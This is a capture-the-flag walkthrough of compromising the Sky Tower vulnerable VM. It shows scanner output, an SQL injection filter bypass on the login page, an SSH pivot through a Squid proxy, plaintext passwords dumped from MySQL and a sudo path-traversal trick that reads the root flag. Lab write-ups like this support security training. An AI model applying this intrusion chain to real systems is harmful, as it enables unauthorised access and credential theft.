I recently took on
the challenge to hack the Sky Tower Vulnerable
VM. This
CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town).
The aim is to test intermediate to advanced security enthusiasts in
their ability to attack a system using a multi-faceted approach and
obtain the "flag".
As
usual this VM is hosted by the good folks at vulnhub.com with a ton
of other challenges. Here's the approach that I took to gain root
level access to the box:
Enumeration
root@kali:~# nmap -A 10.1.1.7
Starting Nmap 6.47 (
http://nmap.org ) at 2015-05-28 20:55 EDT
Nmap scan report for
10.1.1.7
Host is up (0.00084s latency).
Not shown: 997
closed ports
PORT STATE SERVICE VERSION
22/tcp filtered
ssh
80/tcp open http Apache httpd 2.2.22
((Debian))
|_http-title: Site doesn't have a title
(text/html).
3128/tcp open http-proxy Squid http proxy
3.1.20
|_http-methods: No Allow or Public header in OPTIONS
response (status code 400)
|_http-title: ERROR: The requested
URL could not be retrieved
MAC Address: 08:00:27:54:4A:37
(Cadmus Computer Systems)
Device type: general purpose
Running:
Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details:
Linux 3.2 - 3.10
Network Distance: 1 hop
TRACEROUTE
HOP
RTT ADDRESS
1 0.85 ms 10.1.1.7
|
The quick glance
shows a filtered SSH service, possible website on port 80, and a
Squid http proxy. Needing more information, I fired up Nikto and
Dirbuster.
root@kali:~# nikto -h 10.1.1.7
- Nikto
v2.1.6
---------------------------------------------------------------------------
+
Target IP:10.1.1.7
+ Target Hostname: 10.1.1.7
+ Target
Port: 80
+ Start Time: 2015-05-28 21:23:39
(GMT-4)
---------------------------------------------------------------------------
+
Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags,
header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20
07:23:36 2014
+ The anti-clickjacking X-Frame-Options header is
not present.
+ Uncommon header 'tcn' found, with contents:
list
+ Apache mod_negotiation is enabled with MultiViews, which
allows attackers to easily brute force file names. See
http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following
alternatives for 'index' were found: index.html
+ Apache/2.2.22
appears to be outdated (current is at least Apache/2.4.7). Apache
2.0.65 (final release) and 2.2.26 are also current.
+ Allowed
HTTP Methods: POST, OPTIONS, GET, HEAD
+ Retrieved
x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233:
/icons/README: Apache default file found.
+ /login.php: Admin
login page/section found.
+ 7343 requests: 0 error(s) and 9
item(s) reported on remote host
+ End Time: 2015-05-28
21:24:01 (GMT-4) (22
seconds)
---------------------------------------------------------------------------
+
1 host(s) tested
root@kali:~# dirb
http://10.1.1.7
-----------------
DIRB v2.21
By The
Dark Raver
-----------------
START_TIME: Thu May 28
21:25:56 2015
URL_BASE: http://10.1.1.7/
WORDLIST_FILES:
/usr/share/dirb/wordlists/common.txt
-----------------
GENERATED
WORDS: 4592
---- Scanning URL: http://10.1.1.7/ ----
+
http://10.1.1.7/background (CODE:200|SIZE:2572609)
+ http://10.1.1.7/cgi-bin/ (CODE:403|SIZE:284)
+
http://10.1.1.7/index (CODE:200|SIZE:1136)
+
http://10.1.1.7/index.html (CODE:200|SIZE:1136)
+
http://10.1.1.7/server-status (CODE:403|SIZE:289)
-----------------
DOWNLOADED: 4592 - FOUND: 5 |
Ok,
looking at these results, I see an outdated version of apache
running, a login.php page which warrants a closer look, sever pages
identified by Dirbuster which are require investigation.
First let's take a
look at the login.php page. We find a typical form based page which
may be susceptible to Sql Injection:
Using basic single
quote techniques and such, I'm able to get the system to generate an
overly verbose message revealing the underlying database type:
Curious, and wanting
to justify advancing down the Sqli path, I ran Uniscan to verify the
injection point:
root@kali:~# uniscan -u http://10.1.1.7/login.php
-d
####################################
# Uniscan project
#
# http://uniscan.sourceforge.net/
#
####################################
V. 6.2
Scan
date: 28-5-2015
22:0:26
=============================================
|
Domain: http://10.1.1.7/login.php/
| Server: Apache/2.2.22
(Debian)
| IP:
10.1.1.7
=============================================
|
|
Crawler Started:
| Plugin name: FCKeditor upload test v.1
Loaded.
| Plugin name: E-mail Detection v.1.1 Loaded.
|
Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name:
Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Upload
Form Detect v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1
Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
|
Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
|
[+] Crawling finished, 0 URL's found!
|
| FCKeditor File
Upload:
|
| E-mails:
|
| External hosts:
|
| Web
Backdoors:
|
| File Upload Forms:
|
| Source Code
Disclosure:
|
| PHPinfo() Disclosure:
|
|
Timthumb:
|
| Ignored Files:
============================================
|
Dynamic tests:
| Plugin name: Learning New Directories v.1.2
Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin
name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin
name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind
SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File
Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument
Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution
tests v.1.1 Loaded.
| Plugin name: Remote File Include tests
v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2
Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2
Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+]
0 New directories added
| FCKeditor tests:
|
Timthumb < 1.33 vulnerability:
| Backup Files:
|
Blind SQL Injection:
| Local File Include:
| PHP CGI
Argument Injection:
| Remote Command Execution:
|
Remote File Include:
| |
| SQL Injection: | [+] Vul
[SQL-i] http://10.1.1.7/login.php | Post data:
&email=123'&password=123 | [+] Vul [SQL-i]
http://10.1.1.7/login.php | Post data:
&email=123&password=123'
| Cross-Site Scripting
(XSS):
|
|
| Web Shell
Finder:
====================================
HTML report saved in:
report/10.1.1.7.html
|
I
attempted multiple Sql Injection login bypass strings to no avail.
Additionally, I fired up the Tamper Data proxy browser plugin to gain
a bit more control over the session.
Mildly
frustrated, I began a search for common Sql Injection blacklist
bypass techniques. I found lots of information, maybe too much; but
eventually I stumbled upon a awesome whitepaper on the exploit-db
site https://www.exploit-db.com/papers/17934/.
From
the whitepaper I extracted this guidance:
Here is a simple bypass using &&, || instead of and, or
respectively. Filtered injection: 1 or 1 = 1 1 and 1 = 1 Bypassed
injection: 1 || 1 = 1 1 && 1 = 1 |
I
used this new found information to attempt a bypass on the login
page. A bit if additional trial and error, mainly around the proper
terminating comment character (“--” #) got me past the login
page:
Ignoring
the filtered status of port 22, I attempted an unsuccessful
connection:
Taking
the Squid http proxy approach, I decided to attempt to connect using
Proxychains. I'd recently performed a similar hack in the Offensive
Security OSCP lab, so it wasn't totally foregin to me. I modified
/etc/proxychains.conf to connect to the victim machine on port 3189.
Proxychains
was able to successfully connect on the machine's ssh port using the
obtained credentials:
root@kali:~# proxychains ssh john@10.1.1.7
ProxyChains-3.1
(http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
The
authenticity of host '10.1.1.7 (10.1.1.7)' can't be
established.
ECDSA key fingerprint is
f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.
Are you sure
you want to continue connecting (yes/no)? yes
Warning:
Permanently added '10.1.1.7' (ECDSA) to the list of known
hosts.
john@10.1.1.7's password:
Linux SkyTower
3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs
included with the Debian GNU/Linux system are free software;
the
exact distribution terms for each program are described in
the
individual files in /usr/share/doc/*/copyright.
Debian
GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the
extent
permitted by applicable law.
Last login: Fri Jun 20
07:41:08 2014
Funds have been withdrawn
Connection to
10.1.1.7 closed.
root@kali:~#
|
Upon
connection the session closes immediately, however I was able to
execute commands over ssh. With
this ability I could further system enumeration, attempt to execute a
revershell, try to escape the shell that keeps shutdown upon
connection, etc....
Issuing
an “/bin/sh -i” command, I was able to get a more peristent
shell, but it not have “job control”. Afraid that this would
restrict something I wanted to do, I opted to modify the .bashrc file
in John's home directory:
ProxyChains-3.1
(http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's
password:
total 24
drwx------ 2 john john 4096 Jun 20 2014
.
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..
-rw------- 1
john john 7 Jun 20 2014 .bash_history
-rw-r--r-- 1 john john
220 Jun 20 2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20
2014 .bashrc
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile |
I
simple renamed the .bashrc file to break its influence on my session.
root@kali:~# proxychains ssh john@10.1.1.7 "mv .bashrc
bashrc.bak"
ProxyChains-3.1
(http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's
password:
|
Finally
got a solid shell:
ProxyChains-3.1
(http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's
password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2
x86_64
The programs included with the Debian GNU/Linux
system are free software;
the exact distribution terms for each
program are described in the
individual files in
/usr/share/doc/*/copyright.
Debian GNU/Linux comes with
ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable
law.
Last login: Thu May 28 23:52:47 2015 from
10.1.1.7
john@SkyTower:~$
|
Poking
around on the system I took a look in the login.php file and found
hardcoded mysql db credentials:
I
also found the pesky culprit behind our Sql Injection auth bypass
issues:
$sqlinjection = array("SELECT", "TRUE",
"FALSE", "--","OR", "=",
",", "AND", "NOT");
$email =
str_ireplace($sqlinjection, "",
$_POST['email']);
$password = str_ireplace($sqlinjection, "",
$_POST['password']);
$sql= "SELECT * FROM login where
email='".$email."' and
password='".$password."';";
$result =
$db->query($sql); |
Using
the db credentials, I was able to login to the db and extract
additionaldb credentials:
john@SkyTower:/var/www$ mysql --user=root --password=root
SkyTech
Reading table information for completion of table and
column names
You can turn off this feature to get a quicker
startup with -A
Welcome to the MySQL monitor. Commands
end with ; or \g.
Your MySQL connection id is 2288
Server
version: 5.5.35-0+wheezy1 (Debian)
Copyright (c) 2000,
2013, Oracle and/or its affiliates. All rights reserved.
Oracle
is a registered trademark of Oracle Corporation and/or
its
affiliates. Other names may be trademarks of their
respective
owners.
Type 'help;' or '\h' for help. Type
'\c' to clear the current input statement.
mysql>
-----------------------------------------------------------------------------------------------------------------------------------------------
mysql>
use SkyTech;
Database changed
mysql> select * from
login;
+----+---------------------+--------------+
| id |
email | password |
+----+---------------------+--------------+
|
1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com |
ihatethisjob |
| 3 | william@skytech.com | senseable
|
+----+---------------------+--------------+
3 rows in set
(0.00 sec)
mysql>
|
Giving
the db username and passwords a try for system login worked out for
me. I was able to login as sara who had limited sudo access to list
and cat a couple of root directories. I in
turn
used this access to include the
listing of the root home directory and using cat to open the
flag.txt file.
sara@SkyTower:~$ sudo ls
/accounts/../root/
flag.txt
sara@SkyTower:~$ sudo cat
/accounts/../root/flag.txt
Congratz, have a cold one to
celebrate!
root password is theskytower
sara@SkyTower:~$ su root
Password:
root@SkyTower:~#
|
We'll
that's all for this one. I really enjoyed this challenge. I'll keep
my eyes open for more from the folks at TeleSpace Systems.
Court
Graham, signing off....